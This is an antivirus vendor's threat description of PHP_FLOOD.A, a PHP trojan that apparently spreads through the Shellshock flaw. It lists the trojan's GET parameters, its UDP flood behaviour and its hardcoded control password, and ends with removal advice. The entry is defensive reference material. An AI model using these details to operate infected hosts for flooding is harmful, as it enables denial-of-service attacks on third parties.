PHP_FLOOD.A
Troj/PHPFlood-A (Sophos)
Linux, Unix
Threat Type: Trojan
Destructiveness: No
Encrypted: No
In the wild: Yes
TECHNICAL DETAILS
Arrival Details
This Trojan may be downloaded from the following remote sites:
- http://{BLOCKED}.{BLOCKED}.225.119/conf.txt
This malware arrives via the following means:
- CVE-2014-6271
NOTES:
It accepts the following parameters through HTTP GET:
- host
- port
- timeout
- password
It will use the parameters it receives to perform UDP flooding consisting of 65,000 random alphanumeric characters.
If no port is passed, it will randomly pick from ports 79 to 65,000.
It checks if the password is microstresser14.
SOLUTION
Scan your computer with your Trend Micro product to delete files detected as PHP_FLOOD.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.
Did this description help? Tell us how we did.